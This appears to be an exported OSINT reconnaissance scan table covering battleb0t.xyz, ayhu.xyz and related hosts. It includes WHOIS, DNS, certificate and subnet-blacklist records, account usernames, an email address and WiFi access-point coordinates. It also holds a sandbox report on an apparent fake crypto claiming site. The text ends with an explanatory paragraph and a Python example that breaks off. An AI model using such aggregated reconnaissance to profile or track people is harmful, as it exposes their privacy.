Name Server: wesley.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T15:09:16.51Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 15 | 0 | 3 | 0 | None | 2600:1f18:2489:8200::c8 | funny.battleb0t.xyz |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | eliaspinheironeto.github.io | 185.199.108.153 |
| 2023-05-12 03:34:36 | Netblock Membership | No | RIPE | 5 | 0 | 3 | 0 | None | 45.131.109.0/24 | 45.131.109.53 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Disqus (Category: social) https://disqus.com/by/Altpapier/ | Altpapier |
| 2023-05-12 02:55:25 | Social Media Presence | No | Social Network Identifier | 0 | 0 | 4 | 0 | None | Github: https://github.com/Altpapier/SkyHelperAPI/issues | https://github.com/Altpapier/SkyHelperAPI/issues |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.224): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.43): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:38 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01-edu.github.io |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom (Net ID: 00:01:38:3F:26:0C) | 40.2024, 29.0398 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Teespring (Category: business) https://login.creator-spring.com | login |
| 2023-05-12 03:00:58 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.96): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless2 (Net ID: 00:01:36:03:07:83) | 52.3759, 4.8975 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:42:50) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TechAir (Net ID: 00:01:21:30:60:FE) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:62:CF:8A) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:14 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 403 | kekw.battleb0t.xyz |
| 2023-05-12 02:44:15 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | netlify.app | funny.battleb0t.xyz |
| 2023-05-12 02:47:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.108.153:443 | 185.199.108.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:7B:56:15) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 7732 1224 (Net ID: 00:0F:CC:FD:AD:58) | 32.8608, -79.9746 |
| 2023-05-12 02:59:59 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jhruby.web@gmail.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://github.com/walletconnect/walletconnect-monorepo/releases/download/1.7.8/web3-provider.min.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/twbs/bootstrap/blob/master/js/modal.js', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://github.com/jkup/focusable/blob/master/index.js', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://lens-protocoll.xyz/webc/index.php', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_588_IESQMMUTEX_0_519"\n "IsoScope_588_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_588_IESQMMUTEX_0_331"\n "IsoScope_588_IE_EarlyTabStart_0xea0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1416"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_588_ConnHashTable<1416>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_588_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.21.6.70:443"\n "104.17.25.14:443"\n "69.16.175.10:443"\n "65.8.158.85:443"\n "151.101.1.229:443"\n "104.16.123.175:443"\n "192.30.255.113:443"\n "185.199.108.153:443"\n "185.199.108.133:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ethers.io"\n "cdn.jsdelivr.net"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "etherum-libs.github.io"\n "github.com"\n "lens-protocoll.xyz"\n "objects.githubusercontent.com"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "unpkg.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta name="Keywords" content="Lens Protocol - Claiming App\n Lens Protocol - Claiming App a paypal\n Lens Protocol - Claiming App a binance\n Lens Protocol - Claiming App harmony"/>" (Indicator: "dir "; File: "urlref_httpslens-protocoll.xyzwebcindex.php")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, 
u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'"(0, properties_1.defineReadOnly)(this, "publicKey", signingKey.compressedPublicKey);" (Source: jqueryjs_1_.js, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file 
"c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n 
"imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has 
type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Computing websites | cdn-185-199-111-153.github.com |
| 2023-05-12 03:03:40 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01010101lzy.github.io |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 472 (Net ID: 00:02:2D:C3:4A:5F) | 37.7642, -122.3993 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom1372 (Net ID: 00:01:38:85:A8:E5) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.40): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:08:54 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.72 | 34.74.170.74 |
| 2023-05-12 02:55:25 | Linked URL - Internal | No | Google | 0 | 0 | 2 | 0 | None | https://www.ayhu.xyz/ | www.ayhu.xyz |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | YouTube User (Category: video)<br>https://www.youtube.com/user/baptistevauthey/about | baptistevauthey |
| 2023-05-12 02:56:09 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 13 16:23:51.711 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:74:49:47:F4:26:47:0D:47:E2:9A:66:AF:
F3:3B:46:53:9D:6A:00:FC:C4:5B:6D:E9:3D:6A:E5:A3:
AC:D8:18:26:02:21:00:F0:DF:BE:68:08:A5:73:33:B8:
41:78:C8:F1:1D:97:89:D0:3C:53:99:EC:D3:37:A8:F1:
3C:4D:2D:2A:6D:AA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 13 16:23:51.724 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:C5:F1:D7:EC:63:EF:D2:2B:1D:83:7B:
83:54:8D:82:F0:09:7B:86:48:A1:52:8A:D7:9F:9A:A4:
8F:C9:E6:6D:A9:02:21:00:BF:BA:DA:57:96:9F:75:77:
05:96:B4:C2:FA:F6:06:66:B5:84:A9:CC:F1:BA:83:9B:
82:75:E0:63:24:71:36:67
Signature Algorithm: sha256WithRSAEncryption
85:63:54:da:d2:e7:1a:fb:ec:3f:3a:27:f7:a7:67:fe:c8:7b:
01:a2:64:e4:ee:ee:8e:f0:73:aa:5c:d0:77:bb:6f:be:12:26:
63:92:52:2b:90:c5:19:0c:01:d9:fb:68:bc:45:29:22:6d:35:
24:74:65:da:4b:43:d7:65:1a:2d:49:c6:90:fb:fd:df:39:3b:
cf:ed:9d:e1:a6:3d:3e:a0:05:2d:c4:03:55:00:85:97:89:e2:
1e:88:22:b2:ee:28:86:0f:c1:b8:e5:17:29:7c:e7:e3:6e:66:
99:6b:e8:89:3f:2e:a5:71:74:a0:b7:70:7a:4e:d4:b2:8a:69:
b1:f7:4b:20:bd:fb:7b:d5:07:9a:0c:c6:99:dd:4b:3f:c8:5e:
41:b1:8e:dd:2a:1a:39:aa:08:e2:1e:e6:e3:63:8f:d4:59:98:
ae:0a:7d:59:e3:fc:7d:a9:1f:51:9d:83:fc:16:e1:80:20:2f:
21:21:50:dd:de:43:12:b9:29:89:20:37:79:64:39:a0:00:fa:
b9:f2:d1:d6:97:d7:a4:ad:65:b2:7e:a9:68:2b:1e:77:25:f0:
a5:6a:9b:71:2e:77:c5:cb:51:1f:d8:52:be:f1:4f:2f:03:bf:
1b:74:58:57:b0:dc:c1:17:3e:44:8c:02:67:40:b6:b2:69:3c:
5b:81:25:af
| battleb0t.xyz |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:8443 | 188.114.96.0/24 |
| 2023-05-12 03:03:16 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', 
u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
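The row above carries its crt.sh result list as a Python 2 repr (`u'...'` strings, single quotes), not JSON, and lists the precertificate and the final certificate of each issuance as separate entries that share one serial number. The following is an added example, not SpiderFoot's code and not part of the export: it parses six of those entries (copied from the cell above as test input) with `ast.literal_eval`, collapses the precert/leaf duplicates, harvests the concrete hostnames that Certificate Transparency exposes (which is where `mail.ayhu.xyz` comes from even though it no longer resolves), and reports which certificates were still inside their validity window at the row's Date Found.

```python
import ast
from datetime import datetime

# 'Date Found' of the 'Internet Name - Unresolved' row above.
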